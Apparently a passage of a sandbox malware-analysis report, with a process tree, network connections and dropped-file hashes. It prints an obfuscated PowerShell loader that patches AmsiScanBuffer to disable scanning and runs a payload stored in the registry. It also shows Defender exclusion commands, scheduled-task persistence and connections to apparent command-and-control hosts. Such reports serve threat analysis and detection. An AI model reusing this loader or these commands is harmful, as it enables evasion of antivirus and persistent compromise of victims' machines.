[Char](101)+''+[Char](119)+''+[Char](83)+''+'l'+''+[Char](111)+''+'t'+''+[Char](44)+''+[Char](86)+'i'+'r'+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+'',$mHOHrtAtbI,$BgqrkrvyFKyuUC).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+'t'+''+'i'+''+'m'+''+[Char](101)+''+[Char](44)+'M'+'a'+''+'n'+''+'a'+''+[Char](103)+'e'+'d'+'');Write-Output $tyEVppdzzpa.CreateType();}$XvNsKxOuZSUXC=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'y'+[Char](115)+'t'+'e'+''+'m'+''+[Char](46)+'dll')}).GetType('M'+'i'+''+[Char](99)+'r'+[Char](111)+'s'+[Char](111)+''+'f'+'t'+'.'+'W'+[Char](105)+''+[Char](110)+''+'3'+''+[Char](50)+''+[Char](46)+''+'U'+'n'+'s'+'a'+[Char](102)+''+'e'+'N'+[Char](97)+'t'+[Char](105)+''+[Char](118)+''+'e'+''+[Char](77)+''+[Char](101)+''+'t'+'h'+'o'+''+[Char](100)+'s');$ZmpTZzwfgWUUhb=$XvNsKxOuZSUXC.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](80)+''+'r'+'oc'+[Char](65)+''+[Char](100)+''+[Char](100)+''+[Char](114)+''+[Char](101)+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+'u'+''+[Char](98)+'l'+[Char](105)+''+[Char](99)+','+'S'+''+[Char](116)+''+[Char](97)+''+'t'+''+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$OnYMlqRfuVuNKBPJRLT=xjeLFlXJvxoT @([String])([IntPtr]);$hGxWaomfUCSBCKIuthHHip=xjeLFlXJvxoT @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$SvHQLalbNuG=$XvNsKxOuZSUXC.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](77)+''+[Char](111)+''+'d'+''+[Char](117)+''+[Char](108)+''+[Char](101)+'H'+'a'+''+[Char](110)+''+'d'+''+'l'+''+'e'+'').Invoke($Null,@([Object](''+'k'+''+'e'+''+[Char](114)+''+'n'+'e'+[Char](108)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+'d'+''+'l'+''+[Char](108)+'')));$FMPRuWkRraqNqN=$ZmpTZzwfgWUUhb.Invoke($Null,@([Object]$SvHQLalbNuG,[Object](''+[Char](76)+''+[Char](111)+'a'+[Char](100)+''+[Char](76)+''+[Char](105)+'b'+'r'+''+'a'+''+[Char](114)+''+[Char](121)+''+'A'+'')));$PtaUzRiaDWdDVxtcq=$ZmpTZzwfgWUUhb.Invoke($Null,@([Object]$SvHQLalbNuG,[Object](''+[Char](86)+'i'+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+''+'P'+''+[Char](114)+''+[Char](111)+'te'+[Char](99)+''+[Char](116)+'')));$znjogQI=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($FMPRuWkRraqNqN,$OnYMlqRfuVuNKBPJRLT).Invoke(''+[Char](97)+''+'m'+''+'s'+''+'i'+''+'.'+''+[Char](100)+''+'l'+''+[Char](108)+'');$kJOkllUHVpOiOiyoM=$ZmpTZzwfgWUUhb.Invoke($Null,@([Object]$znjogQI,[Object](''+[Char](65)+'m'+'s'+''+'i'+''+'S'+''+[Char](99)+''+[Char](97)+''+[Char](110)+''+[Char](66)+''+'u'+''+[Char](102)+''+'f'+''+[Char](101)+''+[Char](114)+'')));$knRNvBfrBw=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PtaUzRiaDWdDVxtcq,$hGxWaomfUCSBCKIuthHHip).Invoke($kJOkllUHVpOiOiyoM,[uint32]8,4,[ref]$knRNvBfrBw);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$kJOkllUHVpOiOiyoM,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PtaUzRiaDWdDVxtcq,$hGxWaomfUCSBCKIuthHHip).Invoke($kJOkllUHVpOiOiyoM,[uint32]8,0x20,[ref]$knRNvBfrBw);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+'F'+[Char](84)+''+[Char](87)+''+[Char](65)+''+'R'+''+[Char](69)+'').GetValue('x'+'4'+''+[Char](115)+'t'+[Char](97)+''+[Char](103)+''+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{a0b03bef-0f70-49e4-93e4-31bbeeeee3d6}

C:\Windows\SysWOW64\winrm\Microsoft\DriverLocator.exe

"C:\Windows\SysWOW64\winrm\Microsoft\DriverLocator.exe"

C:\Windows\SysWOW64\winrm\Microsoft\drivermapperJoex.exe

"C:\Windows\SysWOW64\winrm\Microsoft\drivermapperJoex.exe"

C:\Users\Admin\AppData\Local\Temp\CgDFtNWD.exe

"C:\Users\Admin\AppData\Local\Temp\CgDFtNWD.exe"

C:\Windows\system32\attrib.exe

attrib +s +h "C:\Windows\SysWOW64\winrm\Microsoft\DriverLocator.exe"

C:\Windows\system32\attrib.exe

attrib +s +h "C:\Windows\SysWOW64\winrm\Microsoft\Drivermapper.exe"

C:\Windows\system32\attrib.exe

attrib +s +h "C:\Windows\SysWOW64\winrm\Microsoft\drivermapperJoex.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\x4V5.2.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'x4V5.2.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\x4Malicious'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4Joex1.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'x4Malicious'

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /F /TN "x4Joex1" /SC ONLOGON /TR "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4Joex1.exe" /RL HIGHEST

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4Joex1.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4Joex1.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Malicious.exe'

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /F /TN "Malicious" /SC ONLOGON /TR "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Malicious.exe" /RL HIGHEST

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Malicious.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Malicious.exe"

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "x4Malicious" /tr "C:\Users\Admin\x4Malicious"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\x4V5.2.exe'

C:\ProgramData\x4V5.2.exe

"C:\ProgramData\x4V5.2.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\x4Shellcode.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4Joex1.exe'

C:\ProgramData\x4Shellcode.exe

"C:\ProgramData\x4Shellcode.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:DEoEBGJjiChX{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$uOoTGwaAgywXvz,[Parameter(Position=1)][Type]$AGuOKAYXqA)$RmXwndVcdnP=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+[Char](102)+''+'l'+''+'e'+''+[Char](99)+'te'+'d'+''+[Char](68)+''+'e'+''+[Char](108)+''+[Char](101)+'g'+[Char](97)+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+'n'+'M'+'e'+[Char](109)+'o'+[Char](114)+'y'+'M'+''+'o'+'d'+[Char](117)+''+'l'+''+'e'+'',$False).DefineType('M'+[Char](121)+''+[Char](68)+'e'+'l'+''+[Char](101)+''+[Char](103)+''+[Char](97)+'te'+[Char](84)+''+'y'+'p'+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+','+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+'c'+''+[Char](44)+''+[Char](83)+''+'e'+''+[Char](97)+''+'l'+''+[Char](101)+''+[Char](100)+',A'+[Char](110)+''+[Char](115)+''+'i'+''+'C'+'la'+[Char](115)+''+[Char](115)+''+','+''+'A'+'uto'+[Char](67)+''+'l'+''+'a'+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$RmXwndVcdnP.DefineConstructor('RT'+[Char](83)+''+'p'+'e'+[Char](99)+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+'N'+'a'+[Char](109)+''+'e'+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+'d'+''+[Char](101)+''+'B'+''+'y'+''+[Char](83)+''+[Char](105)+'g'+[Char](44)+''+[Char](80)+''+'u'+'b'+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$uOoTGwaAgywXvz).SetImplementationFlags(''+[Char](82)+''+'u'+''+'n'+'t'+[Char](105)+''+[Char](109)+''+[Char](101)+','+[Char](77)+'a'+[Char](110)+''+[Char](97)+'g'+'e'+'d');$RmXwndVcdnP.DefineMethod('I'+[Char](110)+''+[Char](118)+''+'o'+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+'u'+''+'b'+''+[Char](108)+''+'i'+''+[Char](99)+''+','+''+[Char](72)+''+[Char](105)+''+[Char](100)+'eB'+'y'+''+'S'+'ig'+','+''+[Char](78)+'e'+'w'+'S'+[Char](108)+''+[Char](111)+''+[Char](116)+''+[Char](44)+''+[Char](86)+'i'+[Char](114)+'t'+[Char](117)+''+'a'+'l',$AGuOKAYXqA,$uOoTGwaAgywXvz).SetImplementationFlags(''+'R'+'u'+[Char](110)+''+[Char](116)+''+[Char](105)+''+'m'+''+[Char](101)+''+[Char](44)+'M'+'a'+''+[Char](110)+''+'a'+'ge'+[Char](100)+'');Write-Output $RmXwndVcdnP.CreateType();}$XGNzFszxOfdtL=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+'s'+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+'.'+''+'d'+''+[Char](108)+''+'l'+'')}).GetType(''+'M'+'i'+'c'+''+'r'+''+'o'+''+[Char](115)+''+'o'+''+[Char](102)+''+[Char](116)+'.'+[Char](87)+'i'+[Char](110)+''+[Char](51)+''+'2'+''+[Char](46)+''+[Char](85)+''+[Char](110)+''+'s'+''+'a'+'f'+[Char](101)+''+[Char](78)+''+[Char](97)+'t'+[Char](105)+''+[Char](118)+''+'e'+''+[Char](77)+''+[Char](101)+''+'t'+'hod'+[Char](115)+'');$uqvipmuGFvoYqY=$XGNzFszxOfdtL.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+'P'+[Char](114)+''+[Char](111)+'c'+[Char](65)+''+[Char](100)+''+[Char](100)+''+'r'+''+'e'+''+[Char](115)+'s',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+'b'+'l'+[Char](105)+''+'c'+''+[Char](44)+'S'+'t'+'atic'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$eHuKsvmAVPIIiRnVQsw=DEoEBGJjiChX @([String])([IntPtr]);$zVZKtbqIDcbtSGwsaNpBbj=DEoEBGJjiChX @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$eaFLgIIWtvN=$XGNzFszxOfdtL.GetMethod(''+'G'+''+'e'+''+[Char](116)+''+'M'+''+[Char](111)+'d'+[Char](117)+''+'l'+''+'e'+''+'H'+''+'a'+''+[Char](110)+''+'d'+''+'l'+''+'e'+'').Invoke($Null,@([Object](''+[Char](107)+''+'e'+''+'r'+''+'n'+''+[Char](101)+''+[Char](108)+''+[Char](51)+''+[Char](50)+''+[Char](46)+'d'+'l'+'l')));$wABVHMQrYEjHvh=$uqvipmuGFvoYqY.Invoke($Null,@([Object]$eaFLgIIWtvN,[Object](''+[Char](76)+''+'o'+'a'+'d'+''+[Char](76)+''+[Char](105)+'b'+[Char](114)+''+[Char](97)+''+[Char](114)+''+'y'+''+[Char](65)+'')));$COnTZLLtMOEuyAgOn=$uqvipmuGFvoYqY.Invoke($Null,@([Object]$eaFLgIIWtvN,[Object]('V'+'i'+''+[Char](114)+''+'t'+''+[Char](117)+''+[Char](97)+''+[Char](108)+'Pr'+[Char](111)+''+[Char](116)+'ec'+'t'+'')));$raCDuSL=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($wABVHMQrYEjHvh,$eHuKsvmAVPIIiRnVQsw).Invoke('a'+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'');$JzmyhkInvwLCaepRW=$uqvipmuGFvoYqY.Invoke($Null,@([Object]$raCDuSL,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](83)+''+[Char](99)+'an'+[Char](66)+''+[Char](117)+'f'+'f'+''+'e'+'r')));$xSmRcpBvxE=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($COnTZLLtMOEuyAgOn,$zVZKtbqIDcbtSGwsaNpBbj).Invoke($JzmyhkInvwLCaepRW,[uint32]8,4,[ref]$xSmRcpBvxE);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$JzmyhkInvwLCaepRW,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($COnTZLLtMOEuyAgOn,$zVZKtbqIDcbtSGwsaNpBbj).Invoke($JzmyhkInvwLCaepRW,[uint32]8,0x20,[ref]$xSmRcpBvxE);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOF'+[Char](84)+''+[Char](87)+''+'A'+''+[Char](82)+''+[Char](69)+'').GetValue(''+'x'+''+'4'+''+[Char](115)+''+'t'+''+[Char](97)+''+[Char](103)+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'x4Joex1.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\x4Joex1.exe'

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{2a93eae8-0868-45cf-842e-7636e08ae158}

C:\Users\Admin\x4Malicious

C:\Users\Admin\x4Malicious

C:\Users\Admin\x4Malicious

C:\Users\Admin\x4Malicious

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{7966B4D8-4FDC-4126-A10B-39A3209AD251}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc

C:\Windows\system32\ApplicationFrameHost.exe

C:\Windows\system32\ApplicationFrameHost.exe -Embedding

C:\Windows\ImmersiveControlPanel\SystemSettings.exe

"C:\Windows\ImmersiveControlPanel\SystemSettings.exe" -ServerName:microsoft.windows.immersivecontrolpanel

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s BthAvctpSvc

C:\Windows\System32\oobe\UserOOBEBroker.exe

C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 rentry.co udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 172.67.75.40:80 rentry.co tcp
US 172.67.75.40:443 rentry.co tcp
GB 20.26.156.215:443 github.com tcp
US 185.199.110.133:443 objects.githubusercontent.com tcp
US 104.16.185.241:80 icanhazip.com tcp
N/A 127.0.0.1:49799 tcp
N/A 127.0.0.1:49802 tcp
US 172.67.75.40:443 rentry.co tcp
N/A 127.0.0.1:49805 tcp
US 162.159.137.232:443 discord.com tcp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 233.38.18.104.in-addr.arpa udp
US 8.8.8.8:53 23.149.64.172.in-addr.arpa udp
US 185.199.110.133:443 objects.githubusercontent.com tcp
N/A 127.0.0.1:49810 tcp
N/A 127.0.0.1:49816 tcp
GB 20.26.156.215:443 github.com tcp
US 185.199.110.133:443 objects.githubusercontent.com tcp
N/A 127.0.0.1:49821 tcp
N/A 127.0.0.1:49824 tcp
N/A 127.0.0.1:49828 tcp
GB 20.26.156.215:443 github.com tcp
N/A 127.0.0.1:49831 tcp
US 185.199.110.133:443 objects.githubusercontent.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 208.95.112.1:80 ip-api.com tcp
FR 162.19.58.159:443 i.ibb.co tcp
US 147.185.221.18:41012 tcp
US 147.185.221.19:2519 seems-radio.gl.at.ply.gg tcp
US 147.185.221.16:13795 adult-purchased.gl.at.ply.gg tcp
US 147.185.221.19:2519 seems-radio.gl.at.ply.gg tcp
US 147.185.221.18:41012 tcp
US 147.185.221.16:13795 adult-purchased.gl.at.ply.gg tcp
US 147.185.221.18:41012 tcp
US 147.185.221.16:13795 adult-purchased.gl.at.ply.gg tcp
US 147.185.221.18:41012 tcp
US 147.185.221.16:13795 adult-purchased.gl.at.ply.gg tcp
GB 184.28.176.81:443 tcp
GB 51.132.193.104:443 browser.pipe.aria.microsoft.com tcp
NL 23.62.61.97:443 r.bing.com tcp
NL 23.62.61.97:443 r.bing.com tcp
NL 23.62.61.97:443 r.bing.com tcp
NL 23.62.61.97:443 r.bing.com tcp
NL 23.62.61.97:443 r.bing.com tcp
NL 23.62.61.97:443 r.bing.com tcp
US 147.185.221.18:41012 tcp
US 147.185.221.16:13795 adult-purchased.gl.at.ply.gg tcp

Files

memory/1940-0-0x00007FF962673000-0x00007FF962675000-memory.dmp

memory/1940-3-0x000002E2A0920000-0x000002E2A0942000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_m5nmxuch.h44.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1940-10-0x00007FF962670000-0x00007FF963132000-memory.dmp

memory/1940-11-0x00007FF962670000-0x00007FF963132000-memory.dmp

memory/1940-12-0x00007FF962670000-0x00007FF963132000-memory.dmp

memory/1940-13-0x000002E2A0F30000-0x000002E2A10F2000-memory.dmp

C:\Users\Public\uninstaller.bat

MD5 5be8fed544d05f92d1f7ecd4015f461a
SHA1 adaf0a846145d891b55d625bb75ae13928f4483c
SHA256 a6e3b90aea7ade9e66ce05dd726737e116a0dea80bcd20ca96ec03e8dedcf699
SHA512 debb8e65a783dc289b02340c0efd11a10e331d9e728d8ba5ae8ec79267e9aeaab611a406def956660f0b3a1fbeb702e564a7ea271c4359734c157f2232c288c2

memory/1940-21-0x00007FF962670000-0x00007FF963132000-memory.dmp

C:\ProgramData\winlog32.bat

MD5 230f2e8c6fa8eee3935356ca122db8ce
SHA1 0d25a7f01224d87b0a408f6e639432d44b20db65
SHA256 4e9d91b0feca6307b850061006f202601154fb0c208306f389810fc8e601e660
SHA512 773436cc55584a52243dd715a29d924dac8284bcba6602c7c5a2548c00213c230e27cc991cb6397fb5bda2ecb9f06ad3f5c6deb6f87f14d530138cce1c9e55c8

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 60efcaf245291c5fb8d700f099c371ea
SHA1 f066c7e948db3cda233b4e2786aad20c7f106920
SHA256 c15fa04d510034cd6e9148ebb92a559e546843d5db98a27086504fab4f36d02e
SHA512 9b1b41ca283062e3ba80d358d5e0a9dfd2603cb66ced63b19349801cb0b260473d8b56a2fbc1f7bda8beceb3499f8ad7dfdef6090e87299e5c7497825749d513

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 4ef1064ce7b9afca99b64412656b1f8b
SHA1 ada040d59728be3036296563f24dfc2644b82510
SHA256 a85a40d4c9e8e2ead9d7a14d8b0f8ddf07cc881e46da8444f7d13eb1872c9565
SHA512 2bbac87ebabfd5d81c2ca7e25defc4a5a6019e9e5d86f9cb4662df6de257aac0d73da1b89408f69ad319909d12c47f7cf96d0581d860a627d96ec2674beac629

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 eb6332ae9e8fec69c2236355e2638f9d
SHA1 71500d57fb304979afd6756f06d4b9a59f995eb7
SHA256 88e5ffe18fd4a772efce68f1b0db839846cafc42d36415508ad5356a44d38f32
SHA512 e87c864ba79bd7a10a62b55ad564cf3acb090e7d85707a6967497deeef5fcde1f0b4608ea8791bf81363ec583a0101d470d8f3cd2172ced8d4071d7f6c674aed

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 fcbfea2bed3d0d2533fe957f0f83e35c
SHA1 70ca46e89e31d8918c482848cd566090aaffd910
SHA256 e97f54e5237ffeca4c9a6454f73690b98ac33e03c201f9f7e465394ecbc3ea38
SHA512 d382453207d961f63624ba4c5a0dea874e6b942f5cad731c262a44371fb25b309eacf608156e0234169e52337796128312e72edb0290c48f56104fe5e52509a6

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 714bacb9b47ade6cac916935bf8e2fd8
SHA1 250094faf06a099c7da5ffc5cc8304c84f1d3061
SHA256 52b48a46211737488c95462fb118cf752b8863317776d40ce9e74b34d8444540
SHA512 0f5de5cd70438002a816117af08d316ebeceef089db4ed25d9424ec9b6ee9cc652cfdf485f17811ad865ebd1a5df1e46a180437809d284b67defb5cd36cb0c4b

C:\Users\Admin\AppData\Local\Temp\SMAtMZpm.exe

MD5 1bb7940802b53faf639f5265e89a18b3
SHA1 46411569489a5bf3844b19ea507b9fa85987551a
SHA256 9c0ef273a15f37bcfda6bd266d6bc7b76050447aa7d4d44a0f1a52f66f44f996
SHA512 2a533a3b1da8eae721f995160796579b138394cf328630d5093203059f4a1e3318f04888edf7cc36a01db5303bc6537a38405b26408a83ce7eb926ab6c909575

C:\Windows\SysWOW64\winrm\Microsoft\Drivermapper.exe

MD5 082f413ea68e0f2d68fce0074c84c88c
SHA1 81c88c629961e3baad67c6b4b5113691c3d9cde5
SHA256 84605e359c091438ed592a1b73c0efbc583f4e6a03c51f8d49861d5e00c91dd1
SHA512 1da80720dd4c079cbafcae78f5497521245806e91424dd36b8a6c79c09813499100dbc7e5c290565d8fd50434f46e4acd9e23a6ad7d8deec29207c46829d3718

memory/4480-77-0x0000000000200000-0x000000000023C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 807e34150dfec5954368008d73b63da4
SHA1 4c0be21e0b0c812901464cf5a6948a8c8f534b71
SHA256 d58cac2eb66f898fb372dd993c4e7a677eef19e67f2e73e4048cceee2e90fd1c
SHA512 a481233a44a75b4122130925ff866feb7ac82719cccbc007e7475b9c32c46058120d9c1a550f53078fa0d5cbb9dcdf4d654c478a3a1b4286ccb73d3de761bf36

memory/4420-88-0x000001794AAF0000-0x000001794AC3F000-memory.dmp

C:\ProgramData\x4V5.2.exe

MD5 1d68a875800780540a7a10e5243a26c1
SHA1 62da3a00ce85933f766bb65b75baf44a1f16d059
SHA256 0cf0eb06b862e6a7b5a28fb4e8d2f80d05a6520f63f8e0bb5922e85c6b41b2f2
SHA512 b3566f4f2a404912a000834fa6f09681e717d3a0f87aa416eb81c233a7a82d94f7b8f65ef734cd277778ebb118f4ccf385fb71cc5a54ec5aa09e932f79ec9842

memory/1540-100-0x0000000000660000-0x000000000067C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 aa7849d1120fa94ceeed026ce00ca2c5
SHA1 a111f0e297e591ca486bb85c94515be0932020eb
SHA256 6a22e9ad970c9e4b5184dc3e4ba14da991a08e7d130394c8396471e809762dc5
SHA512 c124286cafe66563cdd03b58091ff08bfeca9fb7688756564c9603b5c49c78fc98a933c0030caa722e475226e1bdff0fbff413a398889b7fc7cd332ad07b6fbc

memory/408-111-0x000002266E250000-0x000002266E39F000-memory.dmp

C:\ProgramData\x4Shellcode.exe

MD5 8a7bee2c8cec6ac50bc42fe03d3231e6
SHA1 ebc599a15f061a70f6b3ee74b9acfa4e3b4d299d
SHA256 c8139f7fcde9c68cd331bcd438dfea7f02c463c6372dc477ab305da518483db8
SHA512 34370b6f162cb752b1cb91d689705e6f0f247e02744bbbe85347d20cd89e02aba7c5e9e22bb63acc49b4fdc062de12ccf24f481a18c18d2094e1506bb143cad5

memory/2496-129-0x000001FA19BE0000-0x000001FA19C0A000-memory.dmp

memory/2496-131-0x00007FF982120000-0x00007FF9821DD000-memory.dmp

memory/2496-130-0x00007FF9834E0000-0x00007FF9836E9000-memory.dmp

memory/1100-134-0x0000000140000000-0x0000000140008000-memory.dmp

memory/1100-135-0x0000000140000000-0x0000000140008000-memory.dmp

memory/1100-133-0x0000000140000000-0x0000000140008000-memory.dmp

memory/1100-138-0x00007FF9834E0000-0x00007FF9836E9000-memory.dmp

memory/1100-139-0x00007FF982120000-0x00007FF9821DD000-memory.dmp

memory/1100-137-0x0000000140000000-0x0000000140008000-memory.dmp

memory/1100-132-0x0000000140000000-0x0000000140008000-memory.dmp

memory/1100-140-0x0000000140000000-0x0000000140008000-memory.dmp

memory/640-145-0x000001C880290000-0x000001C8802BC000-memory.dmp

memory/640-152-0x00007FF943570000-0x00007FF943580000-memory.dmp

memory/696-163-0x00007FF943570000-0x00007FF943580000-memory.dmp

memory/996-174-0x00007FF943570000-0x00007FF943580000-memory.dmp

memory/472-185-0x00007FF943570000-0x00007FF943580000-memory.dmp

memory/540-189-0x0000020EF7690000-0x0000020EF76BC000-memory.dmp

memory/472-184-0x000001E282EB0000-0x000001E282EDC000-memory.dmp

memory/472-178-0x000001E282EB0000-0x000001E282EDC000-memory.dmp

memory/996-173-0x0000011F59ED0000-0x0000011F59EFC000-memory.dmp

memory/996-167-0x0000011F59ED0000-0x0000011F59EFC000-memory.dmp

memory/696-162-0x0000029426260000-0x000002942628C000-memory.dmp

memory/696-156-0x0000029426260000-0x000002942628C000-memory.dmp

memory/640-151-0x000001C880290000-0x000001C8802BC000-memory.dmp

memory/640-144-0x000001C880290000-0x000001C8802BC000-memory.dmp

memory/640-143-0x000001C880260000-0x000001C880286000-memory.dmp

